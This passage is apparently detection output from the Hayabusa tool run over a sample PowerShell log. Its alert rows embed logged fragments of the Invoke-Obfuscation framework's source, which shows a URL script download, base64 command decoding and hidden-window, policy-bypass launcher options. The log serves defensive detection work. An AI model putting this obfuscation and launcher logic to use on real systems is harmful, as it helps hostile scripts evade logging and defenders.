-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ove filtering step. # E.g. Using *+ instead of *[+] Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' The current Regular Expression caused the following error:' write-host "" $_"" -ForegroundColor Red } # If there are filtered matches in the current menu then randomly choose one for the UserInput value. If($MenuFiltered -ne $NULL) { # Randomly select UserInput from filtered options. $UserInput = (Get-Random -Input $MenuFiltered).Trim() # Output randomly chosen option (and filtered options selected from) if more than one option were returned from regex. If($MenuFiltered.Count -gt 1) { # Change color and verbiage if acceptable options will execute an obfuscation function. 
If($SelectionContainsCommand) { $ColorToOutput = 'Green' } Else { $ColorToOutput = 'Yellow' } Write-Host ""`n`nRandomly selected "" -NoNewline Write-Host $UserInput -NoNewline -ForegroundColor $ColorToOutput write-host "" from the following filtered options: "" -NoNewline For($i=0; $i -lt $MenuFiltered.Count-1; $i++) { Write-Host $MenuFiltered[$i].Trim() -NoNewLine -ForegroundColor $ColorToOutput Write-Host ', ' -NoNewLine } Write-Host $MenuFiltered[$MenuFiltered.Count-1].Trim() -NoNewLine -ForegroundColor $ColorToOutput } } } # If $UserInput is all numbers and is in a menu in $MenusWithMultiSelectNumbers $OverrideAcceptableInput = $FALSE $MenusWithMultiSelectNumbers = @('\Launcher') If(($UserInput.Trim(' 0123456789').Length -eq 0) -AND $BreadCrumb.Contains('\') -AND ($MenusWithMultiSelectNumbers -Contains $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')))) { $OverrideAcceptableInput = $TRUE } If($ExitInputOptions -Contains $UserInput.ToLower()) { Return $ExitInputOptions[0] } ElseIf($MenuInputOptions -Contains $UserInput.ToLower()) { # Commands like 'back' that will return user to previous interactive menu. If($BreadCrumb.Contains('\')) {$UserInput = $BreadCrumb.SubString(0,$BreadCrumb.LastIndexOf('\')).Replace('\','_')} Else {$UserInput = ''} Return $UserInput.ToLower() } ElseIf($HomeMenuInputOptions[0] -Contains $UserInput.ToLower()) { Return $UserInput.ToLower() } ElseIf($UserInput.ToLower().StartsWith('set ')) { # Extract $UserInputOptionName and $UserInputOptionValue from $UserInput SET command. 
$UserInputOptionName = $NULL $UserInputOptionValue = $NULL $HasError = $FALSE $UserInputMinusSet = $UserInput.SubString(4).Trim() If($UserInputMinusSet.IndexOf(' ') -eq -1) { $HasError = $TRUE $UserInputOptionName = $UserInputMinusSet.Trim() } Else { $UserInputOptionName = $UserInputMinusSet.SubString(0,$UserInputMinusSet.IndexOf(' ')).Trim().ToLower() $UserInputOptionValue = $UserInputMinusSet.SubString($UserInputMinusSet.IndexOf(' ')).Trim() } # Validate that $UserInputOptionName is defined in $SettableInputOptions. If($SettableInputOptions -Contains $UserInputOptionName) { # Perform separate validation for $UserInputOptionValue before setting value. Set to 'emptyvalue' if no value was entered. If($UserInputOptionValue.Length -eq 0) {$UserInputOptionName = 'emptyvalue'} Switch($UserInputOptionName.ToLower()) { 'scriptpath' { If($UserInputOptionValue -AND ((Test-Path $UserInputOptionValue) -OR ($UserInputOptionValue -Match '(http|https)://'))) { # Reset ScriptBlock in case it contained a value. $Script:ScriptBlock = '' # Check if user-input ScriptPath is a URL or a directory. If($UserInputOptionValue -Match '(http|https)://') { # ScriptPath is a URL. # Download content. $Script:ScriptBlock = (New-Object Net.WebClient).DownloadString($UserInputOptionValue) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath (as URL):"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } ElseIf ((Get-Item $UserInputOptionValue) -is [System.IO.DirectoryInfo]) { # ScriptPath does not exist. 
Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path is a directory instead of a file (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } Else { # Read contents from user-input ScriptPath value. Get-ChildItem $UserInputOptionValue -ErrorAction Stop | Out-Null $Script:ScriptBlock = [IO.File]::ReadAllText((Resolve-Path $UserInputOptionValue)) # Set script-wide variables for future reference. $Script:ScriptPath = $UserInputOptionValue $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $Script:ScriptBlock $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptPath:"" -ForegroundColor Cyan Write-Host $Script:ScriptPath -ForegroundColor Magenta } } Else { # ScriptPath not found (failed Test-Path). Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' Path not found (' -NoNewLine Write-Host ""$UserInputOptionValue"" -NoNewLine -ForegroundColor Cyan Write-Host "").`n"" -NoNewLine } } 'scriptblock' { # Remove evenly paired {} '' or """" if user includes it around their scriptblock input. ForEach($Char in @(@('{','}'),@('""','""'),@(""'"",""'""))) { While($UserInputOptionValue.StartsWith($Char[0]) -AND $UserInputOptionValue.EndsWith($Char[1])) { $UserInputOptionValue = $UserInputOptionValue.SubString(1,$UserInputOptionValue.Length-2).Trim() } } # Check if input is PowerShell encoded command syntax so we can decode for scriptblock. If($UserInputOptionValue -Match 'powershell(.exe | )\s*-(e |ec |en |enc |enco |encod |encode)\s*[""'']*[a-z=]') { # Extract encoded command. 
$EncodedCommand = $UserInputOptionValue.SubString($UserInputOptionValue.ToLower().IndexOf(' -e')+3) $EncodedCommand = $EncodedCommand.SubString($EncodedCommand.IndexOf(' ')).Trim("" '`"""") # Decode Unicode-encoded $EncodedCommand $UserInputOptionValue = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedCommand)) } # Set script-wide variables for future reference. $Script:ScriptPath = 'N/A' $Script:ScriptBlock = $UserInputOptionValue $Script:ObfuscatedCommand = $UserInputOptionValue $Script:ObfuscatedCommandHistory = @() $Script:ObfuscatedCommandHistory += $UserInputOptionValue $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully set ScriptBlock:"" -ForegroundColor Cyan Write-Host $Script:ScriptBlock -ForegroundColor Magenta } 'emptyvalue' { # No OPTIONVALUE was entered after OPTIONNAME. $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' No value was entered after' -NoNewLine Write-Host ' SCRIPTBLOCK/SCRIPTPATH' -NoNewLine -ForegroundColor Cyan Write-Host '.' 
-NoNewLine } default {Write-Error ""An invalid OPTIONNAME ($UserInputOptionName) was passed to switch block.""; Exit} } } Else { $HasError = $TRUE Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host ' OPTIONNAME' -NoNewLine Write-Host "" $UserInputOptionName"" -NoN",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. $UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. 
If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. 
If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"ewLine -ForegroundColor Cyan Write-Host "" is not a settable option."" -NoNewLine } If($HasError) { Write-Host ""`n Correct syntax is"" -NoNewLine Write-Host ' SET OPTIONNAME VALUE' -NoNewLine -ForegroundColor Green Write-Host '.' -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' SHOW OPTIONS' -NoNewLine -ForegroundColor Yellow Write-Host ' for more details.' } } ElseIf(($AcceptableInput -Contains $UserInput) -OR ($OverrideAcceptableInput)) { # User input matches $AcceptableInput extracted from the current $Menu, so decide if: # 1) an obfuscation function needs to be called and remain in current interactive prompt, or # 2) return value to enter into a new interactive prompt. # Format breadcrumb trail to successfully retrieve the next interactive prompt. 
$UserInput = $BreadCrumb.Trim('\').Replace('\','_') + '_' + $UserInput If($BreadCrumb.StartsWith('\')) {$UserInput = '_' + $UserInput} # If the current selection contains a command to execute then continue. Otherwise return to go to another menu. If($SelectionContainsCommand) { # Make sure user has entered command or path to script. If($Script:ObfuscatedCommand -ne $NULL) { # Iterate through lines in $Menu to extract command for the current selection in $UserInput. ForEach($Line in $Menu) { If($Line[1].Trim(' ') -eq $UserInput.SubString($UserInput.LastIndexOf('_')+1)) {$CommandToExec = $Line[3]; Continue} } If(!$OverrideAcceptableInput) { # Extract arguments from $CommandToExec. $Function = $CommandToExec[0] $Token = $CommandToExec[1] $ObfLevel = $CommandToExec[2] } Else { # Overload above arguments if $OverrideAcceptableInput is $TRUE, and extract $Function from $BreadCrumb Switch($BreadCrumb.ToLower()) { '\launcher\ps' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 1} '\launcher\cmd' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 2} '\launcher\wmic' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 3} '\launcher\rundll' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 4} '\launcher\var+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 5} '\launcher\stdin+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 6} '\launcher\clip+' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 7} '\launcher\var++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 8} '\launcher\stdin++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 9} '\launcher\clip++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 10} '\launcher\rundll++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 11} '\launcher\mshta++' {$Function = 'Out-PowerShellLauncher'; $ObfLevel = 12} default {Write-Error ""An invalid value ($($BreadCrumb.ToLower())) was passed to switch block for setting `$Function when `$OverrideAcceptableInput -eq `$TRUE.""; Exit} } # Extract $ObfLevel from first element 
in array (in case 0th element is used for informational purposes), and extract $Token from $BreadCrumb. $ObfLevel = $Menu[1][3][2] $Token = $UserInput.SubString($UserInput.LastIndexOf('_')+1) } # Convert ObfuscatedCommand (string) to ScriptBlock for next obfuscation function. If(!($Script:LauncherApplied)) { $ObfCommandScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock($Script:ObfuscatedCommand) } # Validate that user has set SCRIPTPATH or SCRIPTBLOCK (by seeing if $Script:ObfuscatedCommand is empty). If($Script:ObfuscatedCommand -eq '') { Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host "" Cannot execute obfuscation commands without setting ScriptPath or ScriptBlock values in SHOW OPTIONS menu. Set these by executing"" -NoNewLine Write-Host ' SET SCRIPTBLOCK script_block_or_command' -NoNewLine -ForegroundColor Green Write-Host ' or' -NoNewLine Write-Host ' SET SCRIPTPATH path_to_script_or_URL' -NoNewLine -ForegroundColor Green Write-Host '.' Continue } # Save current ObfuscatedCommand to see if obfuscation was successful (i.e. no warnings prevented obfuscation from occurring). $ObfuscatedCommandBefore = $Script:ObfuscatedCommand $CmdToPrint = $NULL If($Script:LauncherApplied) { If($Function -eq 'Out-PowerShellLauncher') { $ErrorMessage = ' You have already applied a launcher to ObfuscatedCommand.' } Else { $ErrorMessage = ' You cannot obfuscate after applying a Launcher to ObfuscatedCommand.' } Write-Host ""`n`nERROR:"" -NoNewLine -ForegroundColor Red Write-Host $ErrorMessage -NoNewLine Write-Host ""`n Enter"" -NoNewLine Write-Host ' UNDO' -NoNewLine -ForegroundColor Yellow Write-Host "" to remove the launcher from ObfuscatedCommand.`n"" -NoNewLine } Else { # Switch block to route to the correct function. 
Switch($Function) { 'Out-ObfuscatedTokenCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $Token $ObfLevel $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","" '$Token' $ObfLevel"") } 'Out-ObfuscatedTokenCommandAll' { $Script:ObfuscatedCommand = Out-ObfuscatedTokenCommand -ScriptBlock $ObfCommandScriptBlock $CmdToPrint = @(""Out-ObfuscatedTokenCommand -ScriptBlock "","""") } 'Out-ObfuscatedStringCommand' { $Script:ObfuscatedCommand = Out-ObfuscatedStringCommand -ScriptBlock $ObfCommandScriptBlock $ObfLevel $CmdToPrint = @(""Out-ObfuscatedStringCommand -ScriptBlock "","" $ObfLevel"") } 'Out-EncodedAsciiCommand' { $Script:ObfuscatedCommand = Out-EncodedAsciiCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedAsciiCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedHexCommand' { $Script:ObfuscatedCommand = Out-EncodedHexCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedHexCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedOctalCommand' { $Script:ObfuscatedCommand = Out-EncodedOctalCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedOctalCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBinaryCommand' { $Script:ObfuscatedCommand = Out-EncodedBinaryCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBinaryCommand -ScriptBlock "","" -PassThru"") } 'Out-SecureStringCommand' { $Script:ObfuscatedCommand = Out-SecureStringCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-SecureStringCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedBXORCommand' { $Script:ObfuscatedCommand = Out-EncodedBXORCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedBXORCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedSpecialCharOnlyCommand' { $Script:ObfuscatedCommand = Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ObfCommandScriptBlock 
-PassThru $CmdToPrint = @(""Out-EncodedSpecialCharOnlyCommand -ScriptBlock "","" -PassThru"") } 'Out-EncodedWhitespaceCommand' { $Script:ObfuscatedCommand = Out-EncodedWhitespaceCommand -ScriptBlock $ObfCommandScriptBlock -PassThru $CmdToPrint = @(""Out-EncodedWhitespaceCommand -ScriptBlock "","" -PassThru"") } 'Out-PowerShellLauncher' { # Extract numbers from string so we can output proper flag syntax in ExecutionCommands history. $SwitchesAsStringArray = [char[]]$Token | Sort-Object -Unique | Where-Object {$_ -ne ' '} If($SwitchesAsStringArray -Contains '0') { $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $ObfLevel"") } Else { $HasWindowStyle = $FALSE $SwitchesToPrint = @() ForEach($Value in $SwitchesAsStringArray) { Switch($Value)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"{ 1 {$SwitchesToPrint += '-NoExit'} 2 {$SwitchesToPrint += '-NonInteractive'} 3 {$SwitchesToPrint += '-NoLogo'} 4 {$SwitchesToPrint += '-NoProfile'} 5 {$SwitchesToPrint += '-Command'} 6 {If(!$HasWindowStyle) {$SwitchesToPrint += '-WindowStyle Hidden'; $HasWindowStyle = $TRUE}} 7 {$SwitchesToPrint += '-ExecutionPolicy Bypass'} 8 {$SwitchesToPrint += '-Wow64'} default {Write-Error ""An invalid `$SwitchesAsString value ($Value) was passed to switch block.""; Exit;} } } $SwitchesToPrint = $SwitchesToPrint -Join ' ' $CmdToPrint = @(""Out-PowerShellLauncher -ScriptBlock "","" $SwitchesToPrint $ObfLevel"") } $Script:ObfuscatedCommand = Out-PowerShellLauncher -ScriptBlock $ObfCommandScriptBlock -SwitchesAsString $Token $ObfLevel # Only set LauncherApplied to true if before/after are different (i.e. no warnings prevented launcher from being applied). 
If($ObfuscatedCommandBefore -ne $Script:ObfuscatedCommand) { $Script:LauncherApplied = $TRUE } } default {Write-Error ""An invalid `$Function value ($Function) was passed to switch block.""; Exit;} } If(($Script:ObfuscatedCommand -ceq $ObfuscatedCommandBefore) -AND ($MenuName.StartsWith('_Token_'))) { Write-Host ""`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" There were not any"" -NoNewLine If($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1).ToLower() -ne 'all') {Write-Host "" $($BreadCrumb.SubString($BreadCrumb.LastIndexOf('\')+1))"" -NoNewLine -ForegroundColor Yellow} Write-Host "" tokens to further obfuscate, so nothing changed."" } Else { # Add to $Script:ObfuscatedCommandHistory if a change took place for the current ObfuscatedCommand. $Script:ObfuscatedCommandHistory += , $Script:ObfuscatedCommand # Convert UserInput to CLI syntax to store in CliSyntax variable if obfuscation occurred. $CliSyntaxCurrentCommand = $UserInput.Trim('_ ').Replace('_','\') # Add CLI command syntax to $Script:CliSyntax to maintain a history of commands to arrive at current obfuscated command for CLI syntax. $Script:CliSyntax += $CliSyntaxCurrentCommand # Add execution syntax to $Script:ExecutionCommands to maintain a history of commands to arrive at current obfuscated command. $Script:ExecutionCommands += ($CmdToPrint[0] + '$ScriptBlock' + $CmdToPrint[1]) # Output syntax of CLI syntax and full command we executed in above Switch block. Write-Host ""`nExecuted:`t"" Write-Host "" CLI: "" -NoNewline Write-Host $CliSyntaxCurrentCommand -ForegroundColor Cyan Write-Host "" FULL: "" -NoNewline Write-Host $CmdToPrint[0] -NoNewLine -ForegroundColor Cyan Write-Host '$ScriptBlock' -NoNewLine -ForegroundColor Magenta Write-Host $CmdToPrint[1] -ForegroundColor Cyan # Output obfuscation result. 
Write-Host ""`nResult:`t"" Out-ScriptContents $Script:ObfuscatedCommand -PrintWarning } } } } Else { Return $UserInput } } Else { If ($MenuInputOptionsShowHelp[0] -Contains $UserInput) {Show-HelpMenu} ElseIf($MenuInputOptionsShowOptions[0] -Contains $UserInput) {Show-OptionsMenu} ElseIf($TutorialInputOptions[0] -Contains $UserInput) {Show-Tutorial} ElseIf($ClearScreenInputOptions[0] -Contains $UserInput) {Clear-Host} # For Version 1.0 ASCII art is not necessary. #ElseIf($ShowAsciiArtInputOptions[0] -Contains $UserInput) {Show-AsciiArt -Random} ElseIf($ResetObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to reset."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to reset."" } Else { $Script:LauncherApplied = $FALSE $Script:ObfuscatedCommand = $Script:ScriptBlock $Script:ObfuscatedCommandHistory = @($Script:ScriptBlock) $Script:CliSyntax = @() $Script:ExecutionCommands = @() Write-Host ""`n`nSuccessfully reset ObfuscatedCommand."" -ForegroundColor Cyan } } ElseIf($UndoObfuscationInputOptions[0] -Contains $UserInput) { If(($Script:ObfuscatedCommand -ne $NULL) -AND ($Script:ObfuscatedCommand.Length -eq 0)) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" ObfuscatedCommand has not been set. There is nothing to undo."" } ElseIf($Script:ObfuscatedCommand -ceq $Script:ScriptBlock) { Write-Host ""`n`nWARNING:"" -NoNewLine -ForegroundColor Red Write-Host "" No obfuscation has been applied to ObfuscatedCommand. There is nothing to undo."" } Else { # Set ObfuscatedCommand to the last state in ObfuscatedCommandHistory. 
$Script:ObfuscatedCommand = $Script:ObfuscatedCommandHistory[$Script:ObfuscatedCommandHistory.Count-2] # Remove the last state from ObfuscatedCommandHistory. $Temp = $Script:ObfuscatedCommandHistory $Script:ObfuscatedCommandHistory = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ObfuscatedCommandHistory += $Temp[$i] } # Remove last command from CliSyntax. Trim all trailing OUT or CLIP commands until an obfuscation command is removed. $CliSyntaxCount = $Script:CliSyntax.Count While(($Script:CliSyntax[$CliSyntaxCount-1] -Match '^(clip|out )') -AND ($CliSyntaxCount -gt 0)) { $CliSyntaxCount-- } $Temp = $Script:CliSyntax $Script:CliSyntax = @() For($i=0; $i -lt $CliSyntaxCount-1; $i++) { $Script:CliSyntax += $Temp[$i] } # Remove last command from ExecutionCommands. $Temp = $Script:ExecutionCommands $Script:ExecutionCommands = @() For($i=0; $i -lt $Temp.Count-1; $i++) { $Script:ExecutionCommands += $Temp[$i] } # If this is removing a launcher then we must change the launcher state so we can continue obfuscating. If($Script:LauncherApplied) { $Script:LauncherApplied = $FALSE Write-Host ""`n`nSuccessfully removed launcher from ObfuscatedCommand."" -ForegroundColor Cyan } Else { Write-Host ""`n`nSuccessfully removed last obfuscation from ObfuscatedCommand."" -ForegroundColor Cyan } } } ElseIf(($OutputToDiskInputOptions[0] -Contains $UserInput) -OR ($OutputToDiskInputOptions[0] -Contains 